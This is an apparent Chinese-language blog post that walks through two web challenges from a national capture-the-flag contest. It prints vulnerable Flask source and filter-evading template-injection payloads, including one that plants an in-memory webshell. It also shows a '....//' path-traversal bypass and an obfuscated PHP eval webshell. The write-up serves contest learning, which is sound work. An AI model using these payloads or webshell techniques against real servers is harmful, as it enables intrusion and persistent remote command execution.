<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="关于这次比赛没啥体验感，做的眼睛疼，就安全知识得了点分，做一半打球去了。这个人好菜啊。。。 这篇文章复现一下第一波web中有题解的两道题。 Safe_Proxy源码存在flask ssti漏洞，但是设置了一个反向代理，看不到回显，而且靶机不能出网。 源码： 12345678910111213141516171819202122232425262728293031323334353637383940">
<meta property="og:type" content="article">
<meta property="og:title" content="国赛复现">
<meta property="og:url" content="http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="K1ato&#39;s blog">
<meta property="og:description" content="关于这次比赛没啥体验感，做的眼睛疼，就安全知识得了点分，做一半打球去了。这个人好菜啊。。。 这篇文章复现一下第一波web中有题解的两道题。 Safe_Proxy源码存在flask ssti漏洞，但是设置了一个反向代理，看不到回显，而且靶机不能出网。 源码： 12345678910111213141516171819202122232425262728293031323334353637383940">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-12-16T07:11:16.000Z">
<meta property="article:modified_time" content="2024-12-16T10:40:20.484Z">
<meta property="article:author" content="k1ato">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>国赛复现</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/12/11/pasecactf-2019flask-ssti/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&text=国赛复现"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&title=国赛复现"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&is_video=false&description=国赛复现"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=国赛复现&body=Check out this article: http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&title=国赛复现"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&title=国赛复现"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&title=国赛复现"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&title=国赛复现"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&name=国赛复现&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/&t=国赛复现"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8E%E8%BF%99%E6%AC%A1%E6%AF%94%E8%B5%9B"><span class="toc-number">1.</span> <span class="toc-text">关于这次比赛</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Safe-Proxy"><span class="toc-number">2.</span> <span class="toc-text">Safe_Proxy</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80%EF%BC%9A%E5%86%99%E6%96%87%E4%BB%B6%E5%88%B0app-py%EF%BC%8C%E7%84%B6%E5%90%8E%E7%9B%B4%E6%8E%A5get%E8%AE%BF%E9%97%AE%E5%BE%97%E5%88%B0flag"><span class="toc-number">2.0.1.</span> <span class="toc-text">解法一：写文件到app.py，然后直接get访问得到flag</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C%EF%BC%9A%E6%89%93%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">2.0.2.</span> <span class="toc-text">解法二：打内存马</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hello-web"><span class="toc-number">3.</span> <span class="toc-text">hello_web</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        国赛复现
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">k1ato</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-12-16T07:11:16.000Z" class="dt-published" itemprop="datePublished">2024-12-16</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h3 id="关于这次比赛"><a href="#关于这次比赛" class="headerlink" title="关于这次比赛"></a>关于这次比赛</h3><p>没啥体验感，做的眼睛疼，就安全知识得了点分，做一半打球去了。这个人好菜啊。。。</p>
<p>这篇文章复现一下第一波web中有题解的两道题。</p>
<h3 id="Safe-Proxy"><a href="#Safe-Proxy" class="headerlink" title="Safe_Proxy"></a>Safe_Proxy</h3><p>源码存在flask ssti漏洞，但是设置了一个反向代理，看不到回显，而且靶机不能出网。</p>
<p>源码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template_string</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"><span class="keyword">import</span> html</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&quot;GET&quot;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">source</span>():</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(__file__, <span class="string">&#x27;r&#x27;</span>, encoding=<span class="string">&#x27;utf-8&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;&lt;pre&gt;&#x27;</span>+html.escape(f.read())+<span class="string">&#x27;&lt;/pre&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&quot;POST&quot;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">template</span>():</span><br><span class="line">    template_code = request.form.get(<span class="string">&quot;code&quot;</span>)</span><br><span class="line">    <span class="comment"># 安全过滤</span></span><br><span class="line">    blacklist = [<span class="string">&#x27;__&#x27;</span>, <span class="string">&#x27;import&#x27;</span>, <span class="string">&#x27;os&#x27;</span>, <span class="string">&#x27;sys&#x27;</span>, <span class="string">&#x27;eval&#x27;</span>, <span class="string">&#x27;subprocess&#x27;</span>, <span class="string">&#x27;popen&#x27;</span>, <span class="string">&#x27;system&#x27;</span>, <span class="string">&#x27;\r&#x27;</span>, <span class="string">&#x27;\n&#x27;</span>]</span><br><span class="line">    <span class="keyword">for</span> black <span class="keyword">in</span> blacklist:</span><br><span class="line">        <span class="keyword">if</span> black <span class="keyword">in</span> template_code:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&quot;Forbidden content detected!&quot;</span></span><br><span class="line">    result = render_template_string(template_code)</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;ok&#x27;</span> <span class="keyword">if</span> result <span class="keyword">is</span> <span class="keyword">not</span> <span class="literal">None</span> <span class="keyword">else</span> <span class="string">&#x27;error&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">HTTPProxyHandler</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, target_host, target_port</span>):</span><br><span class="line">        self.target_host = target_host</span><br><span class="line">        self.target_port = target_port</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">handle_request</span>(<span class="params">self, client_socket</span>):</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            request_data = <span class="string">b&quot;&quot;</span></span><br><span class="line">            <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">                chunk = client_socket.recv(<span class="number">4096</span>)</span><br><span class="line">                request_data += chunk</span><br><span class="line">                <span class="keyword">if</span> <span class="built_in">len</span>(chunk) &lt; <span class="number">4096</span>:</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> request_data:</span><br><span class="line">                client_socket.close()</span><br><span class="line">                <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">with</span> socket.socket(socket.AF_INET, socket.SOCK_STREAM) <span class="keyword">as</span> proxy_socket:</span><br><span class="line">                proxy_socket.connect((self.target_host, self.target_port))</span><br><span class="line">                proxy_socket.sendall(request_data)</span><br><span class="line"></span><br><span class="line">                response_data = <span class="string">b&quot;&quot;</span></span><br><span class="line">                <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">                    chunk = proxy_socket.recv(<span class="number">4096</span>)</span><br><span class="line">                    <span class="keyword">if</span> <span class="keyword">not</span> chunk:</span><br><span class="line">                        <span class="keyword">break</span></span><br><span class="line">                    response_data += chunk</span><br><span class="line"></span><br><span class="line">            header_end = response_data.rfind(<span class="string">b&quot;\r\n\r\n&quot;</span>)</span><br><span class="line">            <span class="keyword">if</span> header_end != -<span class="number">1</span>:</span><br><span class="line">                body = response_data[header_end + <span class="number">4</span>:]</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                body = response_data</span><br><span class="line">                </span><br><span class="line">            response_body = body</span><br><span class="line">            response = <span class="string">b&quot;HTTP/1.1 200 OK\r\n&quot;</span> \</span><br><span class="line">                       <span class="string">b&quot;Content-Length: &quot;</span> + <span class="built_in">str</span>(<span class="built_in">len</span>(response_body)).encode() + <span class="string">b&quot;\r\n&quot;</span> \</span><br><span class="line">                       <span class="string">b&quot;Content-Type: text/html; charset=utf-8\r\n&quot;</span> \</span><br><span class="line">                       <span class="string">b&quot;\r\n&quot;</span> + response_body</span><br><span class="line"></span><br><span class="line">            client_socket.sendall(response)</span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">f&quot;Proxy Error: <span class="subst">&#123;e&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="keyword">finally</span>:</span><br><span class="line">            client_socket.close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">start_proxy_server</span>(<span class="params">host, port, target_host, target_port</span>):</span><br><span class="line">    proxy_handler = HTTPProxyHandler(target_host, target_port)</span><br><span class="line">    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">    server_socket.bind((host, port))</span><br><span class="line">    server_socket.listen(<span class="number">100</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;Proxy server is running on <span class="subst">&#123;host&#125;</span>:<span class="subst">&#123;port&#125;</span> and forwarding to <span class="subst">&#123;target_host&#125;</span>:<span class="subst">&#123;target_port&#125;</span>...&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">            client_socket, addr = server_socket.accept()</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">f&quot;Connection from <span class="subst">&#123;addr&#125;</span>&quot;</span>)</span><br><span class="line">            thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))</span><br><span class="line">            thread.daemon = <span class="literal">True</span></span><br><span class="line">            thread.start()</span><br><span class="line">    <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;Shutting down proxy server...&quot;</span>)</span><br><span class="line">    <span class="keyword">finally</span>:</span><br><span class="line">        server_socket.close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">run_flask_app</span>():</span><br><span class="line">    app.run(debug=<span class="literal">False</span>, host=<span class="string">&#x27;127.0.0.1&#x27;</span>, port=<span class="number">5000</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    proxy_host = <span class="string">&quot;0.0.0.0&quot;</span></span><br><span class="line">    proxy_port = <span class="number">5001</span></span><br><span class="line">    target_host = <span class="string">&quot;127.0.0.1&quot;</span></span><br><span class="line">    target_port = <span class="number">5000</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># 安全反代，防止针对响应头的攻击</span></span><br><span class="line">    proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))</span><br><span class="line">    proxy_thread.daemon = <span class="literal">True</span></span><br><span class="line">    proxy_thread.start()</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;Starting Flask app...&quot;</span>)</span><br><span class="line">    run_flask_app()</span><br></pre></td></tr></table></figure>

<p>源码中有过滤，魔改了一下源码，本地跑这个flask应用，然后用Fenjing测试出可行payload，比赛中我先尝试了数据外带，试了curl、nc、bash都不行，推测靶机应该是不能出网，然后尝试打内存马，因为有过滤，我根据Fenjing的payload自己构造内存马poc，格式不太对，没打出来。</p>
<h5 id="解法一：写文件到app-py，然后直接get访问得到flag"><a href="#解法一：写文件到app-py，然后直接get访问得到flag" class="headerlink" title="解法一：写文件到app.py，然后直接get访问得到flag"></a>解法一：写文件到app.py，然后直接get访问得到flag</h5><p>本来我也有修改app.py的想法，可一看<code>debug=False</code>,就断了这个念头，因为之前有一篇文章讲到Flask热加载模式可以修改源码后不重启，我就以为不是热加载模式的时候就不能修改源码。哎。。。就差一点。纠正一下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1.flask热部署，简单说就是你程序改了，现在要重新启动服务器，嫌麻烦？不用重启，服务器会自己悄悄的把更新后的程序给重新加载一遍，这就是热部署</span><br><span class="line"></span><br><span class="line">2.debug=False的时候也可以通过rce修改app.py</span><br></pre></td></tr></table></figure>

<p>那这道题就很简单了，直接执行<code>cat /flag &gt; app.py</code>即可。</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set gl=&#x27;_&#x27;*2+&#x27;globals&#x27;+&#x27;_&#x27;*2%&#125;&#123;%set bu=&#x27;_&#x27;*2+&#x27;builtins&#x27;+&#x27;_&#x27;*2%&#125;&#123;%set im=&#x27;_&#x27;*2+&#x27;i&#x27;&#x27;mport&#x27;+&#x27;_&#x27;*2%&#125;&#123;%set sl=&#x27;so&#x27;[::-1]%&#125;&#123;&#123;cycler.next[gl][bu][im](sl)[&#x27;p&#x27;&#x27;open&#x27;](&#x27;cat /flag &gt; app.py&#x27;).read()&#125;&#125; </span><br></pre></td></tr></table></figure>



<h5 id="解法二：打内存马"><a href="#解法二：打内存马" class="headerlink" title="解法二：打内存马"></a>解法二：打内存马</h5><p>用<code>before_request_funcs.setdefault</code>打回显马，这个内存马poc第一次见，它没有注册路由，而是在http请求前进行了命令执行并回显。</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set gl=&#x27;_&#x27;*2+&#x27;globals&#x27;+&#x27;_&#x27;*2%&#125;&#123;%set bu=&#x27;_&#x27;*2+&#x27;builtins&#x27;+&#x27;_&#x27;*2%&#125;&#123;%set im=&#x27;_&#x27;*2+&#x27;i&#x27;&#x27;mport&#x27;+&#x27;_&#x27;*2%&#125;&#123;%set ay=&#x27;so&#x27;[::-1]%&#125;&#123;&#123;cycler.next[gl][bu][&#x27;ev&#x27;+&#x27;al&#x27;](&quot;_&quot;+&quot;_imp&quot;+&quot;ort_&quot;+&quot;_(&#x27;s&quot;+&quot;ys&#x27;).modules[&#x27;_&quot;+&quot;_main_&quot;+&quot;_&#x27;]._&quot;+&quot;_dict_&quot;+&quot;_[&#x27;app&#x27;].before_request_funcs.setdefault(None,[]).append(lambda:&#x27;&lt;pre&gt;&#123;0&#125;&lt;/pre&gt;&#x27;.format(_&quot;+&quot;_impo&quot;+&quot;rt_&quot;+&quot;_(&#x27;o&quot;+&quot;s&#x27;).po&quot;+&quot;pen(&#x27;cat /flag&#x27;).read()))&quot;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>注意这个poc并没有import os然后用os.popen命令执行，而是import了main模块对app进行操作。</p>
<h3 id="hello-web"><a href="#hello-web" class="headerlink" title="hello_web"></a>hello_web</h3><p>题目提示有<code>../hackme.php</code>和<code>../tips.php</code>，访问了一下显示无关内容，然后就没做了。看了其他师傅的wp说要双写绕过<code>../</code>，题目是把<code>../</code>过滤了，这谁能想到啊。。。</p>
<p>访问<code>....//hackme.php</code>得到hackme.php：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$lJbGIY</span>=<span class="string">&quot;eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME&quot;</span>;</span><br><span class="line"><span class="variable">$OlWYMv</span>=<span class="string">&quot;zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel&quot;</span>;</span><br><span class="line"><span class="variable">$lapUCm</span>=<span class="title function_ invoke__">urldecode</span>(<span class="string">&quot;%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A&quot;</span>);</span><br><span class="line"><span class="variable">$YwzIst</span>=<span class="variable">$lapUCm</span>&#123;<span class="number">3</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">6</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">33</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">30</span>&#125;;<span class="variable">$OxirhK</span>=<span class="variable">$lapUCm</span>&#123;<span class="number">33</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">10</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">24</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">10</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">24</span>&#125;;</span><br><span class="line"><span class="variable">$YpAUWC</span>=<span class="variable">$OxirhK</span>&#123;<span class="number">0</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">18</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">3</span>&#125;.<span class="variable">$OxirhK</span>&#123;<span class="number">0</span>&#125;.<span class="variable">$OxirhK</span>&#123;<span class="number">1</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">24</span>&#125;;<span class="variable">$rVkKjU</span>=<span class="variable">$lapUCm</span>&#123;<span class="number">7</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">13</span>&#125;;</span><br><span class="line"><span class="variable">$YwzIst</span>.=<span class="variable">$lapUCm</span>&#123;<span class="number">22</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">36</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">29</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">26</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">30</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">32</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">35</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">26</span>&#125;.<span class="variable">$lapUCm</span>&#123;<span class="number">30</span>&#125;;</span><br><span class="line"><span class="keyword">eval</span>(<span class="variable">$YwzIst</span>(<span class="string">&quot;JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw==&quot;</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>就是把一些简单的加密叠加起来了，很容易可以解密出来，这个文件就是一个马，蚁剑连然后绕过disable_functions就行了，用<code>find</code>找flag：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -name flag*</span><br></pre></td></tr></table></figure>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8E%E8%BF%99%E6%AC%A1%E6%AF%94%E8%B5%9B"><span class="toc-number">1.</span> <span class="toc-text">关于这次比赛</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Safe-Proxy"><span class="toc-number">2.</span> <span class="toc-text">Safe_Proxy</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80%EF%BC%9A%E5%86%99%E6%96%87%E4%BB%B6%E5%88%B0app-py%EF%BC%8C%E7%84%B6%E5%90%8E%E7%9B%B4%E6%8E%A5get%E8%AE%BF%E9%97%AE%E5%BE%97%E5%88%B0flag"><span class="toc-number">2.0.1.</span> <span class="toc-text">解法一：写文件到app.py，然后直接get访问得到flag</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C%EF%BC%9A%E6%89%93%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">2.0.2.</span> <span class="toc-text">解法二：打内存马</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hello-web"><span class="toc-number">3.</span> <span class="toc-text">hello_web</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/12/16/%E5%9B%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
